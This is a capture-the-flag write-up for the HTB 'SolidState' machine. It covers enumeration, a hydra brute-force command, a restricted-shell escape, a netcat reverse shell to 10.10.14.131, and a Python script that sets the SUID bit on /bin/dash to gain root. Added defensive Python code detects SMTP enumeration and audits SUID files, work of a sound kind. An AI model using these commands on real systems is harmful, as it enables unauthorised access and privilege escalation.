HTB Write-up SolidState (Linux)

One thing I didn't do was to scan all ports.

There's 4555 open

Nmap Result:

22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp  open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open  pop3?
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
119/tcp open  nntp?
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80:

SMTP enum:

found webadmin@solid-state-security.com for email

found this: https://www.hackingarticles.in/4-ways-smtp-enumeration/#:~:text=%204%20ways%20to%20SMTP%20Enumeration%20%201,to%20VRFY%2C%20EXPN%2C%20and%20RCPT%20TO...%20More%20

ismtp -h 10.129.29.189 -e email.txt
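The VRFY/EXPN/RCPT TO probing that a tool like ismtp performs leaves a recognisable trace on the mail server. As an added example (not part of this write-up), here is a small detector that reads a constructed, generic SMTP command log and flags any client that probes many distinct recipients in a short window; the log layout, the thresholds and the function names are my assumptions, and the client address reuses the one from the write-up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in a generic "timestamp client command argument" form.
# Real servers (Postfix, James, ...) each have their own layout, so adapt LINE_RE.
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.10.14.131 VRFY root
2024-01-01T10:00:01 10.10.14.131 VRFY admin
2024-01-01T10:00:02 10.10.14.131 VRFY john
2024-01-01T10:00:02 10.10.14.131 EXPN staff
2024-01-01T10:00:03 10.10.14.131 RCPT TO:<mindy@solid-state-security.com>
2024-01-01T10:00:03 10.10.14.131 RCPT TO:<mailadmin@solid-state-security.com>
2024-01-01T10:05:00 192.0.2.10 RCPT TO:<webadmin@solid-state-security.com>
"""

# timestamp, client address, one of the three probing verbs, and the probed name
LINE_RE = re.compile(r"^(\S+) (\S+) (VRFY|EXPN|RCPT TO):?\s*<?([^>\s]+)>?$")


def parse_line(line):
    """Return (timestamp, client, verb, target) or None for lines that are not probes."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, verb, target = m.groups()
    return datetime.fromisoformat(ts), client, verb, target.lower()


def find_enumerators(log_text, window=timedelta(minutes=5), threshold=5):
    """Flag clients that probe at least `threshold` distinct names within `window`.

    Returns {client: number_of_distinct_names_in_the_busiest_window}.
    """
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            events[rec[1]].append(rec)

    flagged = {}
    for client, recs in events.items():
        recs.sort()  # chronological; records are (timestamp, client, verb, target)
        for i, (start, _, _, _) in enumerate(recs):
            # distinct names probed in the window that opens at this record
            seen = {r[3] for r in recs[i:] if r[0] - start <= window}
            if len(seen) >= threshold:
                flagged[client] = len(seen)
                break
    return flagged


if __name__ == "__main__":
    for client, count in find_enumerators(SAMPLE_LOG).items():
        print(f"{client}: {count} distinct recipients probed, likely enumeration")
```

On a real server, adapt LINE_RE to the server's log layout first. The mitigation side is configuration: most MTAs let you turn VRFY and EXPN off (for Postfix, disable_vrfy_command = yes), whereas RCPT TO probing can only be slowed down with rate limits and a uniform response for unknown recipients.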

POP3 enum:

JAMES

running nmap -p 110,995 --script "pop3-capabilities or pop3-ntlm-info" -sV 10.129.29.189

nothing

brute forcing pop authentication with hydra...no luck?

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V

119 NNTP Enum:

4555 RSIP

nc 10.129.29.189 4555

got in

reset password for users

signed in from Evolution and got a valuable email

Now we are in mindy!

When I first logged in, it had a restricted shell, so I used the trick below.

ssh mindy@10.129.29.189 -t "bash --noprofile"

According to the ssh manual page,

 -t      Force pseudo-terminal allocation.  This can be used to execute
         arbitrary screen-based programs on a remote machine, which can be
         very useful, e.g. when implementing menu services.  Multiple -t
         options force tty allocation, even if ssh has no local tty.

Now I can see other files.

Let's see if we can connect via nc -e /bin/bash 10.10.14.131 1234

it worked!

Let's plug this into tmp.py.

I waited for a min, and I got a root shell!

Another way to get the root:

#!/usr/bin/env python
import os
import sys

# When this script runs with root privileges, set the SUID bit on /bin/dash
# (4755 = setuid + rwxr-xr-x) so that running dash afterwards gives a root shell.
try:
    os.system("chmod 4755 /bin/dash")
except Exception:
    sys.exit()

4 -> setuid bit; 755 is the default permission for most binaries.

dash -> another shell. Unlike bash, it does not drop setuid privileges when executed.

So if we can set the SUID bit separately and execute it, we can escalate privileges.

Type "dash" to run the executable once the permission is confirmed to have changed to -rwsr.
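The 4 in 4755 is exactly the flag a defender can audit for. The following added example (not code from the write-up) walks a filesystem tree for regular files with the SUID bit set and reports any that are not on an allowlist; the allowlist contents, the function names and the sample modes in the test are my assumptions. It renders the mode the way ls -l does, so a freshly modified /bin/dash shows up as -rwsr-xr-x.

```python
import os
import stat

# Constructed allowlist of SUID binaries a stock Debian system is expected to carry.
# A real baseline should be captured from a known-good image of the same build.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/gpasswd",
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
}


def is_setuid(mode):
    """True when the setuid bit (the leading 4 in a mode such as 4755) is set."""
    return bool(mode & stat.S_ISUID)


def find_setuid_files(root):
    """Walk `root` and return [(path, mode)] for every regular file with the SUID bit set."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished entries are skipped
            if stat.S_ISREG(st.st_mode) and is_setuid(st.st_mode):
                found.append((path, st.st_mode))
    return found


def unexpected_setuid(entries, baseline=BASELINE):
    """Entries whose path is not in the baseline, with the mode rendered as ls -l shows it."""
    return sorted(
        (path, stat.filemode(mode)) for path, mode in entries if path not in baseline
    )


if __name__ == "__main__":
    # Run as root on a live host for full coverage; on a busy filesystem this takes a while.
    for path, mode in unexpected_setuid(find_setuid_files("/")):
        print(f"unexpected SUID file: {mode} {path}")
```

Running this periodically and diffing the output against the previous run turns the chmod in tmp.py into an alert rather than a silent change.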
